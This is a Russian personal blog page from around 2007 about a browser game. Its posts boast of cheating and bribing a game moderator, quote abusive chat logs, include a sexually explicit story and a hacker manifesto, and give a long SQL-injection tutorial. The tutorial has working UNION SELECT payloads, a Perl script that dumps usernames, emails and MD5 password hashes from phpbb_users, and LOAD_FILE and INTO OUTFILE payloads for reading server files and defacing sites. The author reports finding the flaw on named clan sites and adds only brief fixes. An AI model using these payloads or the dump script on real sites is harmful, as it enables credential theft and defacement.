|
| updated 20.01.08 23:19 20.01.08 23:06 | Фирменная перестройка , или год крысы в ОС .. |
ru |
В первую очередь я хочу рассказать эту историю для тех кто привык боготворить ОС/Армаду , присмыкаться и выкрикивать на форумах и в чатах что паладины - самые терпеливые , справедливые , честные и безкорыстные люди..
Один из незаурядных случаев в ОС , когда подозреваемый получает хаос не из-за неопровержимых фактов нарушения чего-либо , а из-за многочисленых жалоб игроков .. Причиной заведения дела так и было указано: Многочисленные жалобы игроков. :)
К тому времени , когда за меня основательно взялся весь отдел прокачек и читерств славного города Сансити , через Чиппика прошла уже н-ная сумма кредитов... Кроме того , я успел подчищая логи и заверщенные бои слить более 50000 кр на разных персонажей ..
Стоит заметить , что если бы не мой косяк в программах , логи бы никто не смог обнаружить и хаос висел скорее всего бы вообще без причины ..
Но тк. я решил повыпендриваться и пооставлять следы , да еще такие от которых люди вешались , тыкали в меня пальцем и называли туфедом .. ))
К сожалению , логи почти все потерты , дело стерто и показать вам где я спалился я не могу ..
Потерли это все примерно через месяц после хаоса .. Возможно кто-то успел почитать и посмотреть кусочек моих махинаций , боев итд..
Болтшая часть не попала в область зрения ОС , тк до сих пор более 50000 кр лежит в нычках :)
+ кому-то я что-то подарил , кому-то заказывал кровавые итд ..
Чиппка , мне очень дорог , отчасти потому , что он мой талисман и символ , не знаю как это все объяснить , но он действительно мне дорог больше чем все кредиты вместе взятые..
Когда я постучался Алесу и предложил ему 2-3 тысячи кредитов за то , чтобы он прекратил продлевать мне хаос , он улыбнулся , сказал что он честный и что ему предлагали в 5 раз больше , но он отказался ..
Когда я сказал что могу дать ему и в 10 раз больше , он замолчал .. Потом я предложил Алесу перевести ему в качесте аванса несколько тысяч , чтобы он просто подумал - он ответил что подумает ..
и вот , через несколько дней мне посчастливилось получить ответ от него ..
...
Это один из самых высоких по рангу паладинов.. Я давно знал , что всем глубоко положить на игроков и каждый ищет место , где ему добавят кнопок , ищут где бы подставить жопу под поцелуй , хотят заработать кр ..
Невольно вспоминается одна старая немецкая поговорка *Если Бог с нами , то кто же против нас?* ..
Если этот паладин смог дослужится до этого ранга , то кто все остальные?
Я это все давно знал , мало того , я знаю что в армаде точно такие-же , просто хочу , чтобы все честнейшие стукачи и поэты форумные не рассказывали сказок о паладинской добродетели..
Вот что предпочел выбрать старший паладин , вместо решения проблемы обманутых и кинутых игроков ...
(100 автобус , 25 к кредитов)
Поздравляю вас со вступлением в стажеры ОС , вам осталось найти 99 прокачек и 50 нарушений чата/форума :)
И напоследок один маленький пример безпристрастности паладина Imposer
13:28 [РАРыч] to [чиппи-гламур] пля ну ты отот
13:34 [Imposer] private [ чиппи-гламур ] я не считаю это поводом для наказания. прекратие флцудить
после долгих пререканий и сливания привата очередному паладину постарше ..
Рарыч получает 1 , ОДИН ЧАС молчанки , причем не от импозера - он отказался наотрез ..
После чего я наблюдаю такую картину ..
15:14 [Arw] мля сегодня хоть один бой реально выиграть(
Паладин "Imposer" наложил заклятие молчания на "Arw", сроком 12 часов
Двенадцать часов
И , О чудо!!! От Импозера :)
После того , как сказал Импозеру , он благополучно объявился в моей комнате и стал набрасывать на меня игровые молчи , периодически издеваясь .. =)
Добро пожаловать в паладины и удачного вам дня! :)
|
| Comments: 65 | |
| |
|
|
| updated 11.01.08 03:01 11.01.08 02:46 | МОЗГ - Мировое Общество Защиты Грибов |
ru |
01:54 [чиппи-гламур] Грибной беспредел!
01:55 [чиппи-гламур] Грибница!
01:55 [чиппи-гламур] Грибниг!
01:55 [чиппи-гламур] Гриьной Фей!
01:55 [чиппи-гламур] Нагриба!
01:55 [чиппи-гламур] Погриба!
01:56 [чиппи-гламур] Сделал дело - грибуй смело!
01:56 [чиппи-гламур] Грибной подгон!
01:56 [Тилимилитрямдия] to [чиппи-гламур] дурак?=)))
01:57 [чиппи-гламур] to [Тилимилитрямдия] Грибаг!
01:57 [Тилимилитрямдия] to [чиппи-гламур] гриби отсюда))))
01:58 [чиппи-гламур] to [Тилимилитрямдия] Отгребешь щас
01:58 [Тилимилитрямдия] to [чиппи-гламур] неа))))
01:58 [чиппи-гламур] Гриша
01:58 [чиппи-гламур] Грибалка
01:59 [чиппи-гламур] Грибнайа делянка
02:00 [чиппи-гламур] Грибоедов
02:01 [чиппи-гламур] Грибок стопы
02:02 [чиппи-гламур] Гриболай!
02:02 [чиппи-гламур] Гриб грибу гриб!
02:03 [чиппи-гламур] Гребец
02:03 [чиппи-гламур] Грибуньчик
02:03 [чиппи-гламур] Златогрибый
02:04 [чиппи-гламур] Ищу грибы
02:04 [чиппи-гламур] Жди гребя
02:04 [чиппи-гламур] Осторожно , грибы
02:04 [Karapuzoff] to [чиппи-гламур] запарил уже
02:04 [чиппи-гламур] Ахтунг Грибадэн
02:05 [чиппи-гламур] to [Karapuzoff] Вскройся
02:05 [Тилимилитрямдия] to [чиппи-гламур] молчу хош?
02:05 [чиппи-гламур] Лесной гриб
02:06 [чиппи-гламур] to [Тилимилитрямдия] ты страшная и целлюлитнайа
02:06 [чиппи-гламур] to [Тилимилитрямдия] не пиши мне
02:06 [чиппи-гламур] to [Тилимилитрямдия] побрей пожалуйсто ноги ..
02:06 [Тилимилитрямдия] to [чиппи-гламур] ))))))) лана
02:06 [Тилимилитрямдия] to [чиппи-гламур] смоти
02:07 [чиппи-гламур] Йа смотрю нагрибы
02:07 [чиппи-гламур] Йесли друг - оказался гриб , не срчай
02:08 [чиппи-гламур] Лесной гриб
02:09 [чиппи-гламур] Утри слезы , будь грибом!
02:09 [чиппи-гламур] Грибы сделайут из тебя мужчину!
02:10 [чиппи-гламур] Гриб-хоз
02:10 [чиппи-гламур] В грибном кольце!
02:11 [чиппи-гламур] Йесли не гриб , то кто?
02:11 [чиппи-гламур] Он дружил с грибами ..
02:11 [чиппи-гламур] Грибной саженец!
02:12 [чиппи-гламур] Построить дом , выростить дитя , посадить гриб ..
02:12 [чиппи-гламур] побрить ноги
02:13 [чиппи-гламур] to [Тилимилитрямдия] долго еще смотреть?
02:13 [Тилимилитрямдия] to [чиппи-гламур] неа
02:13 [чиппи-гламур] to [Тилимилитрямдия] позовешь , как побреешь ноги
02:13 [Тилимилитрямдия] to [чиппи-гламур] )))))))
02:14 [чиппи-гламур] Ловец грибов
02:14 Внимание! "Тилимилитрямдия" наложила заклятие молчания на "чиппи-гламур" сроком 30 мин.
02:14 [Тилимилитрямдия] to [чиппи-гламур] усе)
02:14 [Тилимилитрямдия] to [чиппи-гламур] усе)
02:15 [Тилимилитрямдия] to [чиппи-гламур] а терь гриби отсюда))
02:19 [Тилимилитрямдия] private [ чиппи-гламур ] есче раз буш писать такое закровавлю)))))
02:46 [Тилимилитрямдия] private [ чиппи-гламур ] тебя кровонуть нуб?прям сейчас?
02:46 [чиппи-гламур] Целлюлитнайа грибнайа корова ..
02:46 [чиппи-гламур] private [ Тилимилитрямдия ] камон
02:48 [Тилимилитрямдия] private [ чиппи-гламур ] ))))) Ублюдок я тя запомню)))
02:49 [Тилимилитрямдия] private [ чиппи-гламур ] не одного боя не выиграеш))))
ыыыы
|
| Comments: 4 | |
| |
|
|
| updated 11.01.08 04:13 06.01.08 19:39 | show love to ya hood .. Покажи любовь своему раену |
ru |
|
|
| |
|
|
| 14.11.07 08:30 | Торговля наркотиками .. |
ru |
Ты живешь ради Бога и матери - умираешь ради банды .. (c) Mara Salvatrucha Terce
|
|
| |
|
|
| 08.10.07 04:41 | mara salvatrucha |
ru |
|
| Comments: 1 | |
| |
|
|
| 28.09.07 23:49 | Про женский интелект и про минет .. |
ru |
Йа нехотя продрал глаз .. Ну и че , надо кому-то в 10 утра звонить в мою бронированую дверь в квартиру? .. Да так настойчиво ...
В голову пришла мысль , что стоит так и пойти , в одних трусах по-колено и в пуфиках .. Так и пошел ..
- Привет , я не хотела тебя будить ..
- Так а че будила? ..
- Не знаю , просто наверное извиниться хотела ..
- За что?
На лице появилась невинная улыбка ..
- Я думала я в чем-то виновата перед тобой , можно я зайду?
Кивнул , она переступила порог ..
Я оттянул горло кофточки , чтобы посмотреть на ее грудь да и узнать в лифчике она вообще. Не , ниче нету , как обычно голая пухленькая грудь и торчащие соски..
Она улыбнулась и посмотрела вниз ,- то-ли на мою руку , то-ли на свое тело..
Когда она приблизила лицо ко мне , приоткрыла губы для поцелуя - йа уклонился ладонью надавил на ее макушку , заставляя нагнуться ..
Когда она двигала головой , я так и стоял с опущеными руками и смотрел в дверь..
Сперма попала ей на кофточку , на волосы и на брови .. Отвернулся и пошел в душ.. Когда я вышел - ее не было ..
**
Она пришла домой , скинула вещи , переоделась и села в кресло .. Через 30 мин пришел Андрей с работы - веселый и жизнерадосный архитектор..
-Привет маленькая , как дела ..
Она молчит ..
-Что такое?
Когда она тихонько расплакалась , Андрей испугался , подошел поближе..
-Ну что ты , что случилось?
-Андрей , я сама себя понять не могу .. Я не знаю что я могу в этой жизни и что я хочу ..
она плакала
Андрей начал утешать ее и шептать нежные слова..
-Ну что ты , успокойся .. Я тебя люблю ..
Андрей ощутил что его тело трепещет от этих слов ..
Она перестала плакать и посмотрела на него
-Правда любишь?
-Да ..
-Я тебя тоже люблю ..
Андрей присел на краешек кресла и нежно обнял ее..
-Все хорошо , пойдем погуляем .. Сходим в ботанический сад ..
Она уткнулась носом в его грудь ..
-Ты разве не устал с работы?
-Нет ..
***
Я лежал на диване и смотрел в стену .. Без мыслей .. тупо ..
Звонок..
- Привет , ты не спишь ?
-Нет...
-Я хотела извиниться ..
-За что?
-Я думала ты обижаешься , за то что я ушла ..
-Нет ..
-Просто я хочу извиниться за все ..
-И че? ..
Конец ..
|
| Comments: 4 | |
| |
|
|
| 21.09.07 15:58 | гыыы ... |
ru |
<-ВИКТОРИНА-> Вопрос № 13593 из 88230.
----------------------------------------------------------------------
> Очки: 5 - Варианты ответов: 1
Вопрос: временная легкая постройка для жилья, разновидность палатки из ткани, кожи и т.п.
(обычно сооружаемая в форме конуса).
Подсказка: @@@@@
<1> вигвам
<1> шалаш
<1> !
<1> шалаш
<1> вашу мать шалаш это!
<1> шолаж
<-ВИКТОРИНА->Подсказка: ш@@@@
<1> шалащ
<1> твайу дивизию
<1> шалаж сука
<1> шалаж
<-ВИКТОРИНА->Подсказка: ша@@@
<1> твайу мать!!!
<1> шалаш
<2> шатер
<-ВИКТОРИНА-> На этот вопрос правильно ответил: 2, Ответ был: "шатер".
<2> )))
<1> мля)))))
йа каталсо =)
|
|
| |
|
|
| 20.08.07 01:16 | hacked |
ru |
|
Теперь это наш мир , мир электронов и выключателей , мир красоты ботов. У нас нет национальностей , цвета кожи и религиозных убеждений. ВЫ ведете войны , убиваете, обманываете нас , и хотите чтобы мы верили будто вы добродетели , а мы преступники... Да я преступник , я виновен в любознательности , я ХАКЕР и это мой манифест... ВЫ можете поймать меня , но вам не остановить всех...
|
| Comments: 2 | |
| |
|
|
| 16.06.07 03:55 | защити себя сам |
ru |
Для примера использован сайт клана Cossacks Of Hell
В связи с последними событиями в БК , я решил провести исследования клансайтов ..
К сожалению , как оказалось , большая часть подвержена серьезным уязвимостям..Я хочу рассказать вам и сберечь вас от наиболее распространенных..
Как оказалось 80% просмотренных мною клансайтов имеют схожие уязвимости - сиквэл инъекции , что далеко не странно , тк у программистов не хватает больше ума как использовать стандартные проверки в скриптах при обращении к реляционной базе данных..Зачем думать головой , если можно содрать уже написанное ? =))
Зачастую , о наличии сиквэл инъекции могут сказать ошибки , явно указывающие, что произошла ошибка в sql запросе. В тоже время о наличии ошибки в сиквэл запросе можно судить и по косвенным признакам ..
Чтобы реализовать наш с вами взлом давайте найдем параметр , значения которого передаются в запросе к БД.. Это достаточно просто , как правило это может быть параметр для обращения к новостной ленте , галлерии , списку статей , панели регестрации итд ..
структура такого запроса
http://site/test.php?id=номер статьи или новости
естественно , любой нормальный человек , увидев такое в строке запроса или в сорсе кода начнет сУвать туда всякую херь =)
http://site/test.php?id=9999
http://site/test.php?id=ааа
http://site/test.php?id=0
http://site/test.php?id=-0
http://site/test.php?id=-1000
итд
в 10 сайтах , уже на этом этапе я получил ошибку , связанную с неверным сиквэл запросом
Некоторые программисты наивно полагают , что их спасет заключение параметра в одиночные ковычки - ' и ошибочная фильтрация символов.. бугага =)
что-нить типо
<?php
$param=preg_replace("/[a-zA-Z0-9]i","",$param);
?php>
---------------------------------------------------------------------------
если исследуя скрипт выше мы еще не получили ошибки , продолжим =))
http://site/test.php?id=-1'+/*
таким нехитрым маневром мы закрываем первую кавычку и ставим незакрытый сиквэл комментарий , который превращает следующий в запросе код в бесполезную информацию.
вуаля =))
*
Следует отметить , что вы можете и не получать вывод ошибочного запроса , но если в результате ковыряния параметра вы получаете редирект на главную страницу , или еще лучше страницу с пустым запросом или 500 ошибкой шттп - вы на верном пути и правильно выбрали атакуемый параметр ..
*
Дальше можно было бы и не писать ничего , если бы я не сомневался в профессионализме прогеров ..
далее начинаем подбирать верный запрос к таблице , туд , методом перебора выясняется номер столбца с выводом. Нам понадобится знать, в каком по счету столбце происходит вывод на страницу
http://site/test.php?id=-1'+union+select+null/*
если и такой запрос выдаст ошибку синтаксиса или пустую страницу , значит в скрипте, возможно имеется проверка на не пустоту одного из параметров ...
тогда идем конём ..
http://site/test.php?id=-1'+union+select+1/*
еееееее
http://site/test.php?id=-1'+union+select+1,2,3 итд/*
http://site/test.php?id=-1'+union+select+null,null,null,null,null,null,null/*
или если фильтруется пробуем
http://site/test.php?id=-1'+union+select+1,2,3,4,5,6,7/*
вуаля =))
Теперь можно перебирать имена таблиц .. Правильные запросы будут соответствовать существующим именам таблиц .. Наверно , интересно будет проверить на существование таблиц users , passwords , regusers и тд и тп ..
Если выводиться только одна строка из запроса (например , вместо тела статьи) , то можно передвигаться по строкам путем limit ..
http://site/test.php?id=-1'+union+select+1,concat(username,char(58),user_email,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit+1,1/*
вуаля =))
*отдельно стоит рассказать про сиквэл функцию char() .. в качестве аргумента она принимает десятичный код ASCII символа , это нужно в том случае , когда скриптом фильтруются нужные символы...
например char(47) вернет нам / , когда если бы мы отослали его напрямую этот символ бы отфильтровался ..
*
Итак - мы имеем пароли в мд5 , логины и почтовые ящики пользователей .. (n делить на два , потом n деленное на два разделить на два итд)
Методом мат. анализа определяем , что записей в phpbb_forum тут 489 .. Анализируем сорс ошибки..
и пишем несложный скрипт на перле
не люблю я пхп =))
#!/usr/bin/perl -w
use LWP;
use strict;
my $ua=LWP::UserAgent->new;
my $i;
my $res;
$path='путь к уязвимости=-1\'+union+select+1,concat(username,char(58),user_email,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit';
for ($i=1;$i<=488;$i++) {
my $res=$ua->request(HTTP::Request->new(GET=>$path.'+'."$i".',1/*'));
if ($res->is_success) {
$res->content=~/<center>Запрещено просматривать статью '(.*):(.*):(.*)'/;
open (LOG,">>list") || die " cant open file";
print LOG $1.':'.$2.':'.$3."\n";
close LOG;
} else {
print $res->status_line;
}
}
В кратце - используем модуль лвл для последовательного гет запроса ко всем строкам таблицы , выделяем из сорса нужные тэги , а из них в свою очередь - логины , пароли и мэйлы ..
вуаля =))
в фале list , в одной корневой со скриптом через 2 мин у нас вся база данных сайта =))
кидаем пароли клана на подбор в любую утилиту для штурма мд5
и вуаля , через минуту у нас уже пасс от одного соклана ..
а еще через два дня , от половины
но какого же будет ваше удивление , когда в ответ на инъекцию
http://site/test.php?id=-1'+union+select+1,LOAD_FILE(''),3,4,5,6,7/*
вы получите
сайтик то , на винде стоит , а это увеличивает полет фантазии вдвое
нам на самом деле и не нужны пароли , их можно и не качать ..
Достаточно написать что - нить типа
http://site/test.php?id=-1'+union+select+1,LOAD_FILE('путь к любому файлу на диске C:\'),3,4,5,6,7/*
для просмотра любого скрипта
и
http://site/test.php?id=-1'+union+select+1,'',2,3,4,5,6,7+from+phpbb_forum+into+outfile+'C:\usr\local\site\www\index.php'/*
для дефейса .. те подмены главной страницы .. да и вообще стереть любой файл можно ..
или закачать свое ..
Похожие уязвимости я нашел почти на всех топ клан сайтах ..
Даркклан , рмиб и пачке других..
Попытаться исправить это можно путем
- для целых и дробных величин , перед их использованием в запросе надо привести величину к нужному типу ..
$id=(int)$id; $total=(float)$total;
Вместо этого можно вставить систему слежения за тестированием на сиквэл инъекцию ..
if((string)$id<>(string)(int)$id) {
// пишем в лог о попытке ..
die('ops');
}
- для строковых параметров , которые не используются в like , regexp и тд , экранируем кавычки ..
$str=addslashes($str);
или , лучше я всегда советовал
mysql_escape_string($str)
- в строках , которые предполагается использовать внутри like , regexp и тд , необходимо так же заэкранировать специальные символы , применяющиеся в этих операторах , если это необходимо.. В противном случае , можно задокументировать использование этих символов ..
На прощание хочу сказать - никогда не ждите благодарностей от людей..
удачи , и помните - если жизнь свернула вас как удав , терпите =)))
hacked by 4
hacked by RaD
отдельное спасибо Diogen-у
|
| Comments: 19 | |
| |
|
Total posts: 20 Pages: 2
«« « 1 2
|
|
| Mo |
Tu |
We |
Th |
Fr |
Sa |
Su |
| | | | | 1 | 2 | | 3 | 4 | 5 | 6 | 7 | 8 | 9 | | 10 | 11 | 12 | 13 | 14 | 15 | 16 | | 17 | 18 | 19 | 20 | 21 | 22 | 23 | | 24 | 25 | 26 | 27 | 28 | | |
|
